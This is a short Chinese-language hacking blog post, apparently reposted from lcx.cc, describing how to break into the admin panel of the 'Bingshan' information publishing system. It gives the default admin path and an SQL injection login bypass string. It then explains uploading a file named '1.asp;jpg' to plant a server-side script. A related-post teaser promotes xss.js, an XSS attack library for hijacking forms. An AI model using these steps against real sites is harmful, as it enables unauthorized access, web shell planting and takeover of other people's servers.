冰山信息发布系统后台登陆漏洞

  • A+
所属分类:lcx

By:z2681

闲话蛋说

默认后台为 admin

可直接利用 a' or 1=1#     php万能密码进后台

后台有上传 直接上传 1.asp;jpg

点击查看原文件可知路径

大牛误喷!口下积德!

文章来源于lcx.cc:冰山信息发布系统后台登陆漏洞

相关推荐: xss.js 使用手册 [更新 通用表单劫持]

xss.js 是一个用于xss攻击时的基础js库,方便简化与通用化攻击代码. 更新地址 http://mmme.me/xss.js 使用xsser.me可以直接在项目中包含xss.js: 一.判断浏览器 xss.js中是使用dom特性来判断浏览器,用于针对不同…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: